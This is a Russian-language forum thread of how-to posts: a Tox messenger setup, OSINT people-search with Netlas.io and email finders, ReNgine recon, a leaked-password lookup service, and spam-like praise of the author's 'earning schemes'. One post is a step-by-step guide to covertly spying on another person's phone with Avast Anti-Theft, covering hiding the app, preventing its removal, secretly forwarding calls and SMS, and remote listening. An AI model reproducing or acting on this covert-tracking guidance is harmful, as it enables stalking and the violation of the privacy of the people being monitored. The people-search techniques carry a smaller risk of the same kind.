Обмен файлами. Отправка и прием файлов без искусственных ограничений;
Групповой чат. Общение, звонки и обмен видео и файлами в групповых чатах.
Особенности Tox:
Все, что вы делаете в Tox, зашифровано. Единственные люди, которые могут видеть ваши разговоры, – это люди, с которыми вы разговариваете.
Tox – это свободное программное обеспечение. Это означает, что Tox принадлежит вам – для использования, модификации и распространения.
У Tox нет центральных серверов, которые можно было бы обыскать, закрыть или вынудить передать данные. Сеть состоит из ее пользователей. Поскольку здесь нет центрального сервера, пользователи могут просто включить свои клиенты и добавлять друзей без регистрации и настройки на каком-либо сервисе.
На сайте проекта предлагаются клиенты для популярных настольных платформ: Linux, Windows и OS X, а также для мобильных платформ Android и iOS.
Удобство в работе у всех клиентов примерно одинаковое. Вы запускаете клиент, придумываете ник, после чего генерируется Тох ID, который можно передать друзьям. Когда друзья добавят вас, вы получите уведомление; его нужно принять, чтобы установить соединение. Если друг недалеко и он использует мобильный клиент, он может добавить вас, отсканировав QR-код, содержащий Тох ID.
Как установить Tox?
Сначала необходимо скачать программу. Скачать анонимный мессенджер Tox бесплатно, с сайта разработчика вы можете по этой прямой ссылке. Там же на сайте вы можете скачать версии для Linux, OS X, Android и iOS.
Запускаем установщик. Отмечаем все галочки и жмем на кнопку ОК.
https://i.gyazo.com/301f13add69c95214d7113bf7d2fb09d.jpg
Настройка Tox
После запуска перейдем в настройки анонимного мессенджера.
https://i.gyazo.com/27421f40c306e0188934a789bc59cd28.jpg
Теперь необходимо задать псевдоним (ник) и установить текстовый статус.
https://i.gyazo.com/2d34147ca2d4759c590f7b70983e0f45.jpg
В следующем окне вы увидите ваш ToxID – это ваш личный идентификатор. С помощью этого ID вас смогут найти друзья. Советуем выписать его куда нибудь и сохранить.
https://i.gyazo.com/5a647fd376f0d013c89d664e30a447bd.jpg
Выбираем микрофон для записи и воспроизведения звука и камеру для записи видео. Там же вы можете проверить работоспособность выбранных устройств.
https://i.gyazo.com/ab21b0cbe0eea4d3db36b7bfb8220064.jpg
Работа с мессенджером Tox
Для добавления нового контакта необходимо зайти в список друзей.
https://i.gyazo.com/ea1c16674321848ea1e7778f12dcd44f.jpg
В появившемся окне вводим ToxID вашего собеседника и короткое сообщения. В конце нажимаем на
https://i.gyazo.com/7e3eb4f1d6db161e70eafdd3e509d591.jpg
Если кто-нибудь добавил вас — вам придет оповещение. Для подтверждения отмечаем его и нажимаем на кнопку Add.
https://i.gyazo.com/60caa06f92c75f1baaf39e4e31415d73.jpg
В мессенджере есть возможность конференции. Для этого в нижнем левом углу нажмите на вторую иконку.
https://i.gyazo.com/b73a1374b3261b396c5f939ee7349dbe.jpg
Тох: Детоксикация общения
Мы протестировали рТох и Venom на настольном компьютере, а заодно и Antox на Android, и убедились, что разобраться в них очень легко. Текстовые сообщения работали на всех поддерживаемых платформах, так что пользователю Venom на Ubuntu можно отправлять сообщения пользователю рТох на Windows или Antox на Android.
Пользователи всех трех клиентов на настольных ПК могут совершать аудио и видеозвонки между собой, и в нашем тестовом окружении не возникало заметных задержек или искажений. Аналогично, все клиенты могут передавать файлы: мы посылали все, от мелких картинок до больших файлов ISO, и клиенты передавали их друг другу без проблем.
Но есть пара вещей, над которыми все еще ведется активная работа. Самое важное — это возможность совершать аудио и видеозвонки с Android-клиента Antox, которая пока отсутствует. Помимо этого, сейчас в групповых чатах с несколькими участниками вы можете обмениваться только текстовыми сообщениями.
Заключение
На фоне всеобщей осведомленности о безопасности в Сети всё большее число людей чувствует необходимость в защищенной связи. Разработчики Tox обещают все и сразу. И не зря, ведь Tox — сочетает в себе два основных преимущества. Во-первых, он очень удобен, как минимум на настольном ПК. Во-вторых, это не только клиент — по сути, это Р2Р-протокол для передачи шифрованных данных. На этом все. Удачи!
BlackMAST
30.08.2024, 18:01
OSINT: Как найти человека с помощью поисковика Netlas.io
https://i.gyazo.com/8d46a3556423eeddbda526f65497c904.jpg
Вступить в наш чат
Одной из наиболее распространенных задач в OSINT является сбор информации о человеке по псевдониму и/или фамилии и имени. Сегодня расскажу о методе, который не слишком популярен, но может помочь найти сайты, связанные с определенным ником или именем пользователя, на страницах, которые не индексирует Google и не могут быть найдены с помощью инструментов для поиска по нику (Maigret, Sherlock и других). Речь пойдет об использовании поисковика Netlas.io.
https://i.gyazo.com/23590d788de3717e5501814fd37c5b0d.jpg
Поиск по нику и имени с помощью Netlas.io
Netlas.io — это инструмент для обнаружения уязвимостей и угроз безопасности, но он также может использоваться для поиска пользователей в сети.
Netlas.io также предоставляет API и интеграцию с другими инструментами, такими как Maltego.
Использование оператора “http.title”
Перейдите на сайт netlas.io, выберите третью сверху вкладку (Responses Search) и введите:
http.title:*ivanov*
https://i.gyazo.com/994290bc981c9a6414ed6cee7c1dd0d0.png
Netlas.io использование для поиска по нику
Замените ivanov на интересующий вас ник, имя или фамилию пользователя. И не спешите убирать звездочки по бокам слова. Они нужны для того, чтобы искать не точное совпадение, а любые заголовки веб-страниц, в которых присутствует данное слово. Можно убрать одну звездочку, если вам нужны названия, начинающиеся или заканчивающиеся определенным ником.
Не нужно вчитываться в код в поле ответа. Просто откройте найденные ссылки в браузере.
Использование оператора “domain”
Этот пункт пригодится для поиск принадлежащих доменов:
domain:*ivanov*
https://i.gyazo.com/ecce67d330fccd42594c996c8c358285.png
Netlas.io использование для поиска людей
Так можно найти домены, в названии которых присутствует определенный псевдоним.
Использование оператора “http.body”
А этот запрос ищет весь текст страницы вместо заголовка. Обратите внимание, что я не использую здесь звездочки, поскольку такой поиск работает медленнее, и для начала лучше искать только точные совпадения.
http.body:soxoj
https://i.gyazo.com/e17f5244572ac4c5aa3a155d226f57e1.png
Netlas.io использование в OSINT
Этот способ подходит для поиск упоминаний о человеке на сайтах. Но, на мой взгляд, он работает хуже, чем поиск по названию или домену. Используйте его в сочетании с другими инструментами.
Символы (* и ?) и регулярные выражения Netlas
А теперь еще одно важное преимущество Netlas перед обычными поисковыми системами, такими как Google. Если вы не знаете точно, как пишется ник (например, sn0b или snob), вы можете заменить один символ на знак вопроса (или звездочку, если вы не уверены в нескольких символах).
https://i.gyazo.com/85c90ebf1ebaad506081e6dedb67fe30.png
Netlas.io поиск человека
Они также поддерживают некоторые элементы синтаксиса регулярных выражений, что открывает дополнительные возможности поиска.
Хотелось бы также обратить ваше внимание на то, что при поиске по псевдониму следует проявлять творческий подход и проверять не только основное написание, но и использовать альтернативные символы ($ вместо S и т.д.).
Заключение
Не стоит забывать, что большинство задач OSINT можно автоматизировать. И Netlas — не исключение. Он может помочь найти много дополнительной информации о человеке, но не все упоминания о нем в Интернете. Если вы хотите получить максимальное количество данных, используйте другие инструменты и другие методы поиска по нику.
BlackMAST
30.08.2024, 21:05
OSINT-разведка с помощью ReNgine
https://i.gyazo.com/4a9f829f016194526cf904d50c0cdefd.jpg
Вступить в наш чат
OSINT-разведка может занять очень много времени, если делать её вручную, не говоря уже о систематизации полученных результатов. К счастью, существует ReNgine, который может существенно упростить вашу работу. Итак, сегодня мы вам расскажем, как его установить и использовать.
https://i.gyazo.com/31aaec74a43b68144bceeab9a233cbd3.jpg
Что такое ReNgine?
ReNgine — это инструмент OSINT для сбора информации при пентесте, с возможностью непрерывного мониторинга и простым, но интуитивно понятным пользовательским интерфейсом. ReNgine упорядочивает и сохраняется полученную информацию в базе данных. Таким образом, вы всегда можете получить доступ к результатам сканирования. Кроме того, вы можете включить непрерывный мониторинг цели, запуская сканирования с заданными интервалами.
https://i.gyazo.com/3fe6e876e4e8c5d1d926800b6242ba9c.jpg
Панель управленияУстановка и настройка ReNgine
Устанавливать будем с репозитория GitHub:
git clone https://github.com/yogeshojha/rengine && cd rengine
Отредактируйте файл окружения изменив пароль по умолчанию:
nano .env
Запустите сценарий инициализации:
sudo ./install.sh
Этот сценарий установит, настроит и запустит все необходимые контейнеры для запуска ReNgine. Во время установки тулза предложит создать имя пользователя и пароль. Сохраните их, они понадобятся для входа в пользовательский интерфейс.
Введите в браузере https://127.0.0.1, чтобы начать использовать ReNginе.
https://i.gyazo.com/8a16f6c176f80805dd2861fd0dc6260b.jpg
Использование ReNgine
Давайте проведем наше первое сканирование.
Шаг 1. Создайте цель.
Перейдите на вкладку целей и добавьте новую цель. Введите имя домена и, если хотите, описание.
https://i.gyazo.com/d9e20cd44d9e3027fb4c8044d59a68d7.jpg
Добавление цели
https://i.gyazo.com/f7cbbc59a3d9c62e750471bee80ed4a1.jpg
Список целейШаг 2. Выполните первое сканирование
Щелкните по значку молнии рядом с целью, чтобы начать сканирование. В моем случае я буду сканированить поддомены.
https://i.gyazo.com/c03523b131d3b2614080db08049cc113.jpg
Запуск сканирования
https://i.gyazo.com/a3754089c0fa6d3bc56e774979361b57.jpg
Шаг 3. Оценка результатов
После завершения сканирования вы можете просмотреть все результаты. Обратите внимание, что в этом случае мы провели только сканирование поддоменов, однако этот инструмент способен на большее.
https://i.gyazo.com/f235235099d1a5193c5eba7d961bc7cd.jpg
РезультатДавайте рассмотрим еще несколько функций, которые может предложить ReNgine.
Сканирование уязвимостей с помощью Nuclei (настраиваемое);
Параллельное сканирование;
Визуализация данных;
Настраиваемые механизмы сканирования;
Возможности OSINT;
Поддержка прокси.
Более подробное объяснение можно найти в репозитории GitHub по адресу https://github.com/yogeshojha/rengine.
ReNgine — это мощный инструмент OSINT, который поможет выполнить задачи за считанные минуты.
Shvicerg
10.09.2024, 12:08
Всегда важно проверять надежность источников информации и избегать участия в схемах, которые могут оказаться мошенническими.
thryliya1
23.09.2024, 11:01
NEW Авторские статьи / схемы заработка от BlackMast - это настоящая находка для всех, кто хочет успешно зарабатывать в интернете! BlackMast предлагает уникальные и авторские материалы, которые помогают достичь финансовой свободы и успеха в онлайн-бизнесе. Я был приятно удивлен качеством и актуальностью материалов, а также их способностью помочь в создании эффективных стратегий заработка. Схемы заработка от BlackMast действительно работают, и я могу это подтвердить на собственном опыте. Это отличный ресурс для всех, кто хочет достичь успеха в интернете!
thryliya1
28.09.2024, 13:03
BlackMast - настоящий кладезь информации для тех, кто стремится к дополнительному заработку и развитию своего бизнеса. Я лично открыл для себя множество полезных статей и схем заработка на сайте BlackMast, которые помогли мне расширить свои знания и возможности. Особенно хочу отметить практическую направленность советов и схем, которые можно применить сразу же.
Кроме того, BlackMast отлично поддерживает свой сайт и всегда готов помочь своим читателям. Он всегда открыт для общения и готов ответить на любые вопросы.
В целом, сайт BlackMast - это прекрасный ресурс для всех, кто хочет узнать больше о различных схемах заработка и получить ценные советы от настоящего эксперта. Я настоятельно рекомендую посетить сайт BlackMast и изучить его замечательные статьи и схемы. Спасибо за отличную работу, BlackMast!
thryliya1
10.10.2024, 12:38
Я хочу выразить свою искреннюю благодарность автору за его статьи и схемы заработка от BlackMast.
BlackMAST
10.10.2024, 12:39
thryliya1 написал(а):
Я хочу выразить свою искреннюю благодарность автору за его статьи и схемы заработка от BlackMast.
Спасибо вам большое, нам очень приятно слышать такие тёплые слова!
BlackMAST
10.11.2024, 23:10
Слежка за телефоном с помощью Avast Anti-Theft
https://i.gyazo.com/fa39a481646b4d60641ebc33f6506dd5.jpg
Вступить в чат
Следить за мобильным телефоном можно разными способами. Сегодня мы вам расскажем об одном таком способе и, что самое главное, как сделать это скрыто.
Как отследить телефон
Сегодня речь пойдет о приложении Avast Anti-Theft, которое кроме своей основной функции Антивор может использоваться как приложение для отслеживания телефона.
Установив антивирус Аваст вместе с программой Аваст Анти-Вор, с помощью которой мы и будем следить за телефоном, можно отлично замаскировать и скрыть факт слежки.
Приложение Avast Anti-Theft создано для поиска потерянного смартфона и планшета. Также может использоваться родителями для наблюдения и контроля за детьми. Используя приложение Avast Anti-Theft в целях слежки, скрытого наблюдения, и для внегласной прослушки за посторонними людьми — вы нарушаете законодательство вашей страны!
Использование Avast Anti-Theft для слежки за телефоном
Почему именно Avast Anti-Theft?
Устанавливая на свой телефон любое приложение для отслеживания телефона вы даете этому приложению кучу прав и разрешений. Поэтому очень важно чтобы программа, а точнее разработчик, имел хорошую репутацию.
Основные возможности Avast Anti-Theft
Давайте рассмотрим, что известная антивирусная компания предлагает пользователю. Начнем с того, что приложение имеет две версии: бесплатную и платную.
В бесплатной версии:
Отслеживание местоположения.
Полное и окончательное уничтожение данных.
Экстренная блокировка телефона.
Включение сирены.
Скрытая переадресация всех звонков и смс-сообщений.
Отправка сообщений на телефон.
Звонок на телефон.
Частичная маскировка приложения на телефоне.
Список доверенных SIM-карт.
Экономия заряда аккумулятора.
Уведомление о разряженной батарее.
Удаленная перезагрузка.
Удаленное изменение настроек Avast Anti-Theft
В премиум версии:
Удаленно прослушивание и запись звука.
Снимок с камер (фронтальной и задней).
Получение данных хранящихся на телефоне.
Как вы видите даже в бесплатной версии приложения Аваст Анти-Вор довольно большие возможности. Теперь давайте разберемся как его установить, настроить и правильно с ним работать.
Скачать Avast Anti-Theft
Устанавливать приложение нужно на то устройство, которые необходимо отследить. Удаленно установить не получится. Необходимо иметь физический доступ к смартфону или другому мобильному устройству.
Для начала перейдем на страницу скачивания. Скачать приложение Avast Anti-Theft можно по этой прямой ссылке с Google Play. Переходим на официальную страницу приложения и нажимаем «Установить».
С недавнего времени приложение Avast Anti-Theft стало частью приложения Avast Antivirus. Установить отдельно невозможно.
Как я уже говорил, каждый раз при скачивании приложений с маркета надо смотреть какие права просит программа. В данном случае список разрешений довольно большой, и это не есть хорошо. Но с этим нечего не поделаешь, так как программе для корректной работы и в самом деле нужен доступ к этим параметрам.
После установки нажимаем «Открыть» или закрываем Google Play и запускаем приложение с помощью значка на рабочем столе.
Настройка Avast Anti-Theft
После запуска вам предложат ввести имя владельца устройства. Вводим и нажимаем «Продолжить».
А теперь надо установить Пин-код. Дважды вводим секретный код и нажимаем «Подтвердить». Связываем созданную учетную запись с веб-панелью Avast.
Для этого необходимо зарегистрировать свой аккаунт на сайте Аваст. Вводим рабочий адрес электронной почты и дважды пароль. Очень не рекомендую регистрироваться или авторизоваться с помощью социальных сетей.
Не забудьте надежно сохранить пароль, он вам понадобится. Для этой цели мы рекомендуем использовать лучший на наш взгляд менеджер паролей KeePass.
Если вы все сделали правильно, появится главное окно программы.
Для активации устройства и включения защиты необходимо перевести ползунок в положение активный. Программа не даст включить режим слежения до тех пор, пока не будут заполнены все необходимые поля!
После включения скрытого режима будет удален ярлык программы на рабочем столе и в меню приложений. Для вызова приложения необходимо послать специальную команду из контрольной панели на сайте Avast. После этого приложение поднимется и вы сможете изменить настройки. Кроме этого можно изменять настройки приложения прямо из контрольной панели, удаленно, не прибегая к запуску приложения на самом устройстве.
В принципе здесь нечего рассказывать, все предельно просто. Вы разберетесь сами. Многое тут зависит от ваших личных предпочтений. Разработчик постарался на славу и каждый пункт настроек снабдил подробными подсказками.
Все что касается телефона мы вроде разобрались. Теперь перейдем к веб-интерфейсу Аваст с помощью которого мы и будем отслеживать и контролировать смартфон / планшет через интернет.
Заходим на официальный сайт Avast (в нашем случае мы использовали мобильную версию сайта, так как хотели отследить телефон с помощью другого телефона) и вводим логин и пароль, которые мы зарегистрировали устанавливая приложение.
Если интерфейс будет на английском, то сразу меняем его на ваш язык. Нажимаем на иконку «Три полоски» и в выпадающем меню нажимаем на пункт «Language Settings». Затем выбираем нужный язык.
На главной странице отображены все устройства на которых установлено приложение Аваст Анти-вор и другие продукты компании Avast. Нажав на устройство мы попадаем в центр управления. Все настройки, мониторинг и контроль устройства происходят здесь.
Наверху состояние устройства, а ниже инструменты управления. Не будем подробно рассказывать про каждый инструмент, расскажу лишь как включать и отключать ту или иную функцию.
Нажимая на одну из иконок вы заходите в управление функцией. Серый цвет иконки говорит о том, что функция не активирована, а зеленый цвет означает, что инструмент включен.
К примеру, вам необходимо отследить местоположение на карте. Нажимаем на иконку «Найти», которая отвечает за местоположение телефона, и смотрим где в данный момент находится смартфон или планшет. Кроме этого есть возможность просмотреть всю историю перемещения телефона и точные координаты устройства, как за все время, так и за определенный период.
Теперь пару слов по поводу того как программа скрывает свое присутствие. Как мы поняли, в премиум версии приложение умеет скрывать себя полностью. Пользователь не увидит приложение в списке своих приложений. В обычной версии такой возможности нет, но есть интересная функция, активация которой не дает пользователю возможность удалить приложение.
Ну вот вроде и все.
Заключение
Не забывайте, что есть не мало приложений, которые предлагают те же функции, но во время того как вы следите за другими — они могут следить за вами. Не забывайте о безопасности ваших близких и защите телефона! Как вы видите отследить телефон не так уж и трудно. Мы постарались объяснить максимально доступно, чтобы было понятно даже новичку в компьютерных делах.
BlackMAST
11.11.2024, 01:04
OSINT email по домену
https://i.gyazo.com/6430715190929fdc17153c0acd1ce62b.jpg
Вступить в наш канал
Когда необходимо собрать информацию о людях, связанных с определенным доменом, специальные инструменты для поиска электронной почты могут стать незаменимыми помощниками. В этой статье рассмотрим несколько популярных сайтов и инструментов для эффективного поиска email-адреса, связанного с определенным доменом.
https://i.gyazo.com/fde22f66bf6c21b5feaaa7f2b8b05c3f.jpg
Поиск электронной почты по домену
Многие из переставленных ниже сервисов платны, но имеют определенное количество бесплатных запросов, как правило — 50 контактов в месяц. Этого вполне достаточно, чтобы получить необходимую информацию. Платные пакеты — примерно 50$.
Snov.io Email Finder — это один из лучших инструментов для поиска электронной почты. Он позволяет быстро находить адреса электронной почты, связанные с любым доменом. Помимо поиска email, Snov.io также предоставляет функции для проверки валидности найденных контактов. Есть возможность интеграции с CRM-системами.
Experte Email Finder — простой и эффективный сайт для поиска email-адресов по доменам. Этот инструмент подходит для быстрого сбора контактов без лишних функций и сложных настроек. Он будет полезен тем, кто ищет минималистичный и интуитивно понятный сервис для выполнения конкретной задачи.
EmailFinder — это опенсорсный проект, размещенный на GitHub. Этот инструмент позволяет находить email-адреса, связанные с доменом, через сканирование общедоступной информации в интернете. Он более технически сложен по сравнению с веб-сервисами.
Infoga — еще один популярный опенсорсный инструмент для поиска электронной почты. Этот проект активно используется специалистами по информационной безопасности и теми, кто занимается OSINT (разведка на основе открытых данных). Infoga позволяет проводить глубокий анализ домена и поиск связанных email-адресов. Отлично подходит для OSINT.
Infoga.io— это веб-версия ранее описанного проекта Infoga. В отличие от GitHub-версии, которая требует установки и настройки, Infoga.io предоставляет удобный интерфейс для выполнения тех же задач без необходимости погружения в технические детали. Пользователи могут воспользоваться всеми преимуществами инструмента Infoga напрямую через браузер.
Findemail.io— это еще один мощный инструмент для поиска адресов электронной почты, который использует несколько источников данных для поиска адресов, связанных с определенным доменом. Сервис позволяет проверять валидность адресов и использовать различные фильтры для более точного поиска.
Hunter.io— это один из самых известных и широко используемых сервисов для поиска email-адресов по домену. Сервис позволяет легко и быстро находить корпоративные email-адреса, а также предоставляет информацию о структуре адресов компании. Hunter.io также предлагает интеграции с различными инструментами и API для автоматизации процессов. Интеграция с CRM и маркетинговыми инструментами.
Anymailfinder — это удобный инструмент для поиска электронной почты, который делает акцент на точность. Сервис использует различные алгоритмы и проверяет валидность всех найденных адресов, чтобы избежать неработающих контактов. Anymailfinder предлагает бесплатную проверку адресов и возможность интеграции с различными системами.
Minelead — это бесплатный инструмент для поиска email-адресов, который выделяется своей простотой и доступностью. Сервис предоставляет пользователям возможность находить адреса электронной почты по доменам без необходимости подписки или оплаты. Minelead.io подходит для тех, кто ищет простое решение для повседневных задач.
https://i.gyazo.com/af91482a78d9c41c0fcb6f929f7feaea.jpg
Заключение
Если вы ищете простой веб-интерфейс, такие сервисы как Hunter.io или Snov.io отлично подойдут любителям разведки. Для более технических пользователей, таких как специалисты OSINT, инструменты Infoga или EmailFinder, размещенные на GitHub, предложат больше гибкости и возможностей.
BlackMAST
15.11.2024, 16:10
Ваш пароль в базе утечек? Что делать?
https://i.gyazo.com/ff0a9cc1dcad8ac1a559d715e844e38f.jpg
Вступить в наш канал
Первое, что приходит на ум, когда мы слышим слово «безопасность», — это «пароль». Однако, большинство людей не уделяют особого внимания своей безопасности, что приводит к большому количеству утечек данных. В нашей статье мы поделимся с вами сервисом, который покажет, попали ли ваши пароли в базу с утечками данных, и что дальше делать с этой информацией.
https://i.gyazo.com/84fd8a5b998fa88e6091d6b1aa2a0a78.jpg
Недавно была опубликована крупнейшая база данных с утекшими учетными данными (email-адресами, именами пользователей и паролями), названная COMB. Эта утечка стала крупнейшей в истории, объединив более 3,2 миллиарда учетных данных, которые были скомпрометированы в результате различных инцидентов за прошедшие годы. Среди утекших данных оказались пароли пользователей многих сайтов: VK, Gmail, Instagram, Netflix, Facebookи т,д.
Эти утечки были результатом многочисленных инцидентов за последние несколько лет, что и позволило объединить более 3,2 миллиарда учетных данных в одну базу Proxynova.
Цель этого инструмента — сделать огромную базу утекших данных доступной для поиска. Хотя цель этого сервиса заключается в повышении уровня безопасности пользователей, его легко можно использовать с противоположной целью — для поиска чужих данных и попытки их использования на различных сайтах. Это связано с тем, что многие люди используют один и тот же пароль для разных сервисов.
Сайт также предоставляет доступ к базе через API, что позволяет интегрировать поиск с вашим собственным приложением. Максимальный лимит — 100 результатов.
Как предотвратить утечку данных?
Создайте надежный пароль. В идеале он должен иметь от 20 до 40 символов и храниться только у вас в голове. Для того, чтобы его не удалось подобрать методом BruteForce важно не использовать информацию, имеющую какое-то к вам отношение - имена, псевдонимы, клички. Фразы и памятные даты тоже под запретом. Пароль должен содержать символы, цифры и буквы верхнего и нижнего регистра.
Используйте разные пароли. Это, пожалуй, один из важных и ключевых моментов. Ведь многие пользователи пренебрегают этим правилом, используя один пароль для всего на свете. Чем это грозит? Если ваш пароль попадет в руки злоумышленника, то он получит доступ ко всем сервисам, что захочет. Поэтому никогда так не делайте, используйте для разных сервисов различные комбинации.
Меняйтесь пароли. Вдобавок к предыдущему пункту, в целях профилактики необходимо регулярно менять пароли, хотя бы раз в год. И, что более важно, не используйте старые пароли, так как вы снижаете вашу степень защиты.
Подключите двухфакторную аутентификацию. Например, пароль + СМС код. Такая комбинация не даст злоумышленникам получить доступ к вашему аккаунту, даже если у них будет пароль для входа. Такая мера значительно уменьшает шанс взлома. Помимо этого, сервисы, работающие с двухфакторной аутентификацией, как правило, оповещают вас, если была попытка входа в ваш профиль.
Не доверяйте ненадежным сервисам. Перед тем, как вводить свои данные на каком-нибудь сайте, внимательно изучите его, если вас мучают сомнения, то не рискуйте. Старайтесь указывать лишь необходимую информацию, нужную для работы сервиса.
Используйте лицензионные антивирусы. Это поможет уберечь ваш ПК от вирусов, тем самым снизив риск утечки личных данных.
Избегайте общественных сетей Wi-Fi, так как данные зачастую сливаются именно таким способом. Взломать и перехватить данные по Wi-Fi не составляет труда даже для новичка в этом деле, что уж тут сказать про профессионала. Но если все-таки вы вынуждены подключиться к общественной сети, то делайте это только с VPN - он переадресует ваши данные и убережет от взлома.
Что делать, если утечка уже произошла?
Первое, что нужно уяснить, так это то, что нет необходимости впадать в панику, если вы узнали, что ваши данные слили. "Это еще почему?", - спросите вы. А потому, что утечки и сливы происходят в б̶о̶л̶ь̶ш̶о̶м̶ нереально огромном количестве. В открытую базу данных за раз могут попасть данные тысячи человек, а иногда даже миллиарда. Так что вероятность того, что заинтересуются именно вами крайне мала. Скорее всего вы уже 100 раз узнаете об утечке.
1. Если вы нашли себя в базе слитых данных, то вам нужно посмотреть, с какой утечкой это связано. В списке могут отображаться как утечки по сайтам, так и не привязанные к какому-то конкретному ресурсу. Каждый пункт сообщает, когда произошла утечка.
2. Когда вы выяснили, какие именно данные утекли в сеть, самое время начинать смену не только паролей, но и желательно самих email адресов. Если вы использовали разные пароли для сервисов, то вы сразу сможете понять, где была утечка, и вам не придется везде менять данные. Теперь вы еще больше понимаете, для чего нужны разные пароли для входа на каждый сервис.
Заключение
Если вам кажется, что вас никогда не взломают, и что ваши пароли надежные и не пробиваемые, то это не так. К несчастью, никто не может быть застрахован от утечки данных. Риск, того, что вас взломают, даже если вы будете следовать всем советам, все равно остается. Но это не значит, что нужно упрощать жизнь хакерам, всегда нужно быть начеку и принимать необходимые меры защиты.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot